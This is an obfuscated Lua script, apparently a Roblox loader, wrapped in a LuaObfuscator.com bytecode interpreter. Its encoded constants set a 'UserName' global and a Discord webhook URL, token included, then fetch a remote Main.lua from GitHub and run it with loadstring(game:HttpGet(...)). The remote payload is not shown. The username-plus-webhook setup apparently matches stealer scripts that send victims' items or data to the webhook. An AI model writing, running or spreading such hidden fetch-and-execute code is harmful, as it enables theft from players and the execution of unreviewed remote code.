--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (3==v0) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==5) then v16=nil;v16=function(v25,v26,...)local v27=1;local v28;v25=v5(v4(v25,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v77=0;local v78;while true do if (v77==0) then v78=v3(v1(v29,16));if v28 then local v94=v6(v78,v28);v28=nil;return v94;else return v78;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v79=0 -0 ;local v80;while true do if (v79==0) then v80=(v31/((3 -1)^(v32-(1 + (135 -(103 + 32))))))%((694 -(249 + 443))^(((v33-(680 -(337 + 342))) -(v32-(1979 -(376 + 1602)))) + 1 + 0)) ;return v80-(v80%(1 + 0)) ;end end else local v81=2^(v32-1) ;return (((v31%(v81 + v81))>=v81) and 1) or (0 + 0) ;end end local function v34()local v47=(0 -0) -0 ;local v48;while true do if ((1 -0)==v47) then return v48;end if (v47==(0 -0)) then v48=v2(v25,v27,v27);v27=v27 + 1 + 0 ;v47=1 + 0 ;end end end local function v35()local v49,v50=v2(v25,v27,v27 + 2 + 0 );v27=v27 + (48 -(34 + 12)) ;return (v50 * (2184 -(738 + 1190))) + v49 ;end local function v36()local v51,v52,v53,v54=v2(v25,v27,v27 + (11 -8) );v27=v27 + (1270 -(1240 + (1307 -(958 + 323)))) ;return (v54 * (16778798 -(480 + 1102))) + (v53 * (24450 + 41086)) + (v52 * (467 -211)) + v51 ;end local function v37()local v55=v36();local v56=v36();local v57=1 -0 ;local v58=(v30(v56,4 -3 ,1019 -(252 + 747) ) * ((1689 -(1133 + 554))^(45 -(7 + 6)))) + v55 ;local v59=v30(v56,1001 -(23 + 957) ,69 -38 );local v60=((v30(v56,32)==(1 -0)) and  -((1918 -(1242 + 673)) -2)) or (2 -1) ;if (v59==(347 -(112 + 235))) then if (v58==(0 -0)) then return v60 * (0 -(0 + 0)) ;else local v86=0 -0 ;while true do if (v86==(0 + 0)) then v59=3 -2 ;v57=0 + 0 ;break;end end end elseif (v59==(5019 -2972)) then return ((v58==(514 -(248 + 266))) and (v60 * ((2 -1)/(1760 -(525 + 1235))))) or (v60 * NaN) ;end return v9(v60,v59-((3129 -865) -(2729 -(12 + 1476))) ) * (v57 + (v58/((2 + 0)^(207 -155)))) ;end local function v38(v39)local v61;if  not v39 then local v82=95 -(35 + 60) ;while true do if (v82==(0 + 0)) then v39=v36();if (v39==(1612 -(1245 + 367))) then return "";end break;end end end v61=v4(v25,v27,(v27 + v39) -((9 -6) -2) );v27=v27 + v39 ;local v62={};for v75=1, #v61 do v62[v75]=v3(v2(v4(v61,v75,v75)));end return v7(v62);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v63=0;local v64;local v65;local v66;local v67;local v68;local v69;local v70;while true do if (v63~=1) then else v66=nil;v67=nil;v63=1 + 1 ;end if (v63==(4 -1)) then v70=nil;while true do local v87=0;while true do if (v87==1) then if (v64~=(22 -(5 + 14))) then else local v105=0 -0 ;while true do if (v105~=0) then else for v120=1 + 0 ,v36() do v66[v120-(1 -0) ]=v42();end for v122=120 -(21 + 98) ,v36() do v67[v122]=v36();end v105=1 -0 ;end if (v105==(486 -(151 + 334))) then return v68;end end end if ((914 -(14 + 900))~=v64) then else local v106=0 -0 ;while true do if (v106==0) then v65={};v66={};v106=1 + 0 ;end if (v106~=1) then else v67={};v64=1;break;end end end break;end if ((0 -0)==v87) then if (v64~=(1 + 0)) then else local v107=0;while true do if (v107~=0) then else local v118=0;while true do if (v118==(669 -(208 + 461))) then v68={v65,v66,nil,v67};v69=v36();v118=559 -(153 + 405) ;end if (v118~=(1 + 0)) then else v107=529 -(145 + 383) ;break;end end end if (v107~=(1 -0)) then else v70={};v64=2;break;end end end if (v64~=(1007 -(281 + 724))) then else local v108=0;while true do if (v108==1) then for v124=76 -(43 + 32) ,v36() do local v125=0 -0 ;local v126;local v127;local v128;while true do if (v125~=(131 -(70 + 60))) then else v128=nil;while true do if (v126==0) then local v136=0;while true do if (v136~=0) then else v127=684 -(177 + 507) ;v128=nil;v136=1;end if (v136==(1 + 0)) then v126=1617 -(1094 + 522) ;break;end end end if (v126~=(817 -(207 + 609))) then else while true do if (v127==0) then v128=v34();if (v30(v128,2 -1 ,1)~=(1719 -(33 + 1686))) then else local v159=0;local v160;local v161;local v162;while true do if (2~=v159) then else local v166=0;while true do if (v166~=0) then else if (v30(v161,1 -0 ,4 -3 )==(2 -1)) then v162[2]=v70[v162[220 -(55 + 163) ]];end if (v30(v161,4 -2 ,1118 -(746 + 370) )==(2 -1)) then v162[3]=v70[v162[2 + 1 ]];end v166=1;end if (1==v166) then v159=2 + 1 ;break;end end end if (v159==(1087 -(305 + 781))) then local v167=0 + 0 ;while true do if (v167==(0 -0)) then v162={v35(),v35(),nil,nil};if (v160==0) then local v187=0;local v188;local v189;local v190;while true do if (v187~=(0 + 0)) then else v188=1750 -(1143 + 607) ;v189=nil;v187=1 -0 ;end if (v187==1) then v190=nil;while true do if (v188==(1127 -(451 + 676))) then local v195=0;while true do if (v195==1) then v188=3 -2 ;break;end if (v195==(695 -(548 + 147))) then v189=0 + 0 ;v190=nil;v195=1 -0 ;end end end if (v188==(1 + 0)) then while true do if (v189~=0) then else v190=0 + 0 ;while true do if (v190==0) then v162[3]=v35();v162[4]=v35();break;end end break;end end break;end end break;end end elseif (v160==1) then v162[6 -3 ]=v36();elseif (v160==2) then v162[4 -1 ]=v36() -(2^(544 -(195 + 333))) ;elseif (v160==3) then local v196=0 + 0 ;local v197;while true do if (v196~=0) then else v197=0 -0 ;while true do if (v197~=(727 -(651 + 76))) then else v162[1558 -(619 + 936) ]=v36() -(2^16) ;v162[4]=v35();break;end end break;end end end v167=960 -(577 + 382) ;end if (v167==(1 -0)) then v159=271 -(53 + 216) ;break;end end end if (v159~=(11 -8)) then else if (v30(v161,8 -5 ,3)==1) then v162[1354 -(1180 + 170) ]=v70[v162[11 -7 ]];end v65[v124]=v162;break;end if (v159==(0 + 0)) then local v169=0;while true do if (v169==(1 -0)) then v159=1;break;end if (v169==(898 -(111 + 787))) then local v179=0;while true do if (1==v179) then v169=1 + 0 ;break;end if ((0 + 0)~=v179) then else v160=v30(v128,1821 -(752 + 1067) ,10 -7 );v161=v30(v128,4,1600 -(1211 + 383) );v179=1;end end end end end end end break;end end break;end end break;end if (v125~=0) then else v126=0;v127=nil;v125=1;end end end v64=3;break;end if (v108~=(0 -0)) then else for v129=1,v69 do local v130=0 -0 ;local v131;local v132;local v133;while true do if (v130==1) then v133=nil;while true do if (v131~=(0 -0)) then else local v137=1449 -(919 + 530) ;local v138;while true do if (v137~=0) then else v138=804 -(26 + 778) ;while true do if ((1 + 0)==v138) then v131=1;break;end if (v138==(0 + 0)) then v132=v34();v133=nil;v138=1 + 0 ;end end break;end end end if (v131==1) then if (v132==1) then v133=v34()~=(1597 -(858 + 739)) ;elseif (v132==2) then v133=v37();elseif (v132~=(3 + 0)) then else v133=v38();end v70[v129]=v133;break;end end break;end if (v130~=(111 -(49 + 62))) then else v131=0 -0 ;v132=nil;v130=791 -(358 + 432) ;end end end v68[932 -(414 + 515) ]=v34();v108=2 -1 ;end end end v87=1;end end end break;end if (v63==(1153 -(291 + 860))) then v68=nil;v69=nil;v63=3;end if (v63~=0) then else v64=25 -(14 + 11) ;v65=nil;v63=1153 -(869 + 283) ;end end end local function v43(v44,v45,v46)local v71=0;local v72;local v73;local v74;while true do if (v71==0) then v72=v44[1];v73=v44[2];v71=1;end if (v71==1) then v74=v44[3];return function(...)local v88=0;local v89;local v90;local v91;local v92;local v93;while true do if (v88==3) then A,B=v41(v12(v93));if  not A[1] then local v109=0;local v110;while true do if (v109==0) then v110=v44[4][v89] or "?" ;error("Script error at ["   .. v110   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end break;end if (v88==0) then v89=1;v90= -1;v88=1;end if (v88==2) then v93=nil;v93=function()local v95=v72;local v96=v73;local v97=v74;local v98=v41;local v99={};local v100={};local v101={};for v111=0 -(0 + 0) ,v92 do if ((v111>=v97) or ((2717 -(13 + 607))<(68 + 618))) then v99[v111-v97 ]=v91[v111 + 1 + 0 ];else v101[v111]=v91[v111 + (2 -1) ];end end local v102=(v92-v97) + (2 -1) ;local v103;local v104;while true do local v112=0 + 0 ;local v113;while true do if ((v112==0) or ((767 + 2103)<=(4054 -(748 + 493)))) then v113=0 -0 ;while true do if ((v113==(0 -0)) or ((1471 + 637)>(5808 -(1306 + 500)))) then v103=v95[v89];v104=v103[1 + 0 ];v113=1 + 0 ;end if (((2692 -(805 + 60))<=(21166 -16323)) and (((853 -388) -(83 + 325 + 56))==v113)) then if ((v104<=(4 + 0)) or ((2969 -(1057 + 596))==(8583 -4022))) then if (((437 -(47 + 298))<=(26 + 104)) and (v104<=(1121 -(67 + 1053)))) then if ((v104==(0 -0)) or (4758<(1087 -509))) then local v140=1007 -(639 + 368) ;local v141;while true do if (((0 + 0)==v140) or ((3373 + 1238)<=((4018 -2463) -690))) then v141=v103[2];v101[v141]=v101[v141](v14(v101,v141 + (1 -0) ,v90));break;end end else local v142=1573 -(1338 + 235) ;local v143;local v144;local v145;local v146;local v147;while true do if ((4656>(4588 -(1887 + 25))) and (v142==((1381 -(533 + 848)) + 0))) then v143=732 -(716 + 16) ;v144=nil;v142=1578 -(276 + 1301) ;end if (((3196 + 198)>(3592 -((1829 -1193) + 882))) and (v142==(2 + 0))) then v147=nil;while true do if (((12113 -(4265 + 4088))<=(5414 -(379 + 1047))) and (v143==(807 -(429 + 214 + 163)))) then v90=(v146 + v144) -(1 -0) ;v147=1475 -(775 + 700) ;v143=2 + 0 ;end if (((7048 -4214)<=(3280 -(33 + 86))) and (v143==(1 + 1))) then for v175=v144,v90 do local v176=0 + 0 ;while true do if ((v176==0) or (2275>(471 + 728 + 1356))) then v147=v147 + 1 ;v101[v175]=v145[v147];break;end end end break;end if (((1394 + 536)>=(338 + 1453)) and (v143==(0 + 0))) then v144=v103[5 -3 ];v145,v146=v98(v101[v144](v14(v101,v144 + 1 ,v103[472 -(193 + 276) ])));v143=1 + 0 + 0 ;end end break;end if ((v142==(1 + 0)) or ((3117 -(188 + 1685))>=(5662 -(586 + 1056)))) then v145=nil;v146=nil;v142=2;end end end elseif ((v104<=((1979 -(267 + 1711)) + 1)) or ((1254 -612)>=(15038 -11065))) then local v148=0 + 0 ;local v149;local v150;local v151;while true do if (((8605 -4014)>=(1649 + 1979 + 163)) and (v148==(1 + 0))) then v151=nil;while true do if (((86 + 1730)<=(1631 + 2367)) and (1==v149)) then v101[v150 + (1 -0) ]=v151;v101[v150]=v151[v103[1 + 3 ]];break;end if ((1430>(24 + 93)) and (v149==(1273 -(1256 + 17)))) then local v174=901 -(36 + 725 + 140) ;while true do if (((2474 -1784)<(4991 -(242 + 62))) and (v174==1)) then v149=1 + (1864 -(1427 + 437)) ;break;end if ((v174==(0 -0)) or ((3277 -(449 + 320))<=(2115 -(291 + 647)))) then local v180=0 + 0 ;while true do if (((1 + 0 + 0)==v180) or (3403>=(22890 -17979))) then v174=1032 -(751 + 280) ;break;end if ((421<=(1345 + 830 + 2721)) and (v180==(0 + 0))) then v150=v103[1 + 1 ];v151=v101[v103[3]];v180=(1285 + 162) -(711 + 735) ;end end end end end end break;end if (((1779 -(496 + 260))>477) and (v148==(0 -0))) then v149=0 -0 ;v150=nil;v148=1 + 0 ;end end elseif (((4081 -(286 + 1188))>=(749 -341)) and (v104>(458 -(384 + 59 + 12)))) then do return;end else v101[v103[1007 -(89 + 916) ]]=v46[v103[(1012 -(1008 + 1)) + 0 ]];end elseif ((v104<=((348 -(193 + 57)) -(85 + 3 + 4))) or ((3508 -(141 + 303))==(4129 -((928 -626) + 406)))) then if ((v104==(11 -(1770 -(71 + 1693)))) or (((3576 -(700 + 14)) -2136)>=(328 + 2174))) then v101[v103[1 + 1 ]]();else v101[v103[2 + 0 ]]=v103[2 + 1 ];end elseif (((1718 -(876 + 91))<(397 + 620)) and (v104<=(19 -12))) then v89=v103[410 -(329 + 78) ];elseif (((1799 -(252 + 1005))<(3300 + 732)) and (v104==(19 -(49 -38)))) then v46[v103[3]]=v101[v103[2]];elseif ((v101[v103[170 -(88 + 80) ]]==v103[3 + (722 -(697 + 24)) ]) or (836>(10677 -6005))) then v89=v89 + ((1785 -(558 + 1224)) -2) ;else v89=v103[649 -(478 + 168) ];end v89=v89 + 1 ;break;end end break;end end end end;v88=3;end if (v88==1) then v91={...};v92=v13("#",...) -1 ;v88=2;end end end;end end end return v43(v42(),{},v26)(...);end;v16("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C756103083O00557365724E616D65030C3O0077612O73696D746865666F7803073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313834353239364O3037333836392F596A75562D3833597A374D46337A505773312D713734744E622O366158397652686F734558754E2O724A624C46336373796350454F726C7673566E463470476A3053366100143O0012063O00013O0026093O000B000100020004073O000B0001001203000100033O001203000200043O002002000200020005001206000400064O0001000200046O00013O00022O00050001000100010004073O001300010026093O0001000100010004073O00010001001206000100083O001208000100073O0012060001000A3O001208000100093O0012063O00023O0004073O000100012O00043O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end end end
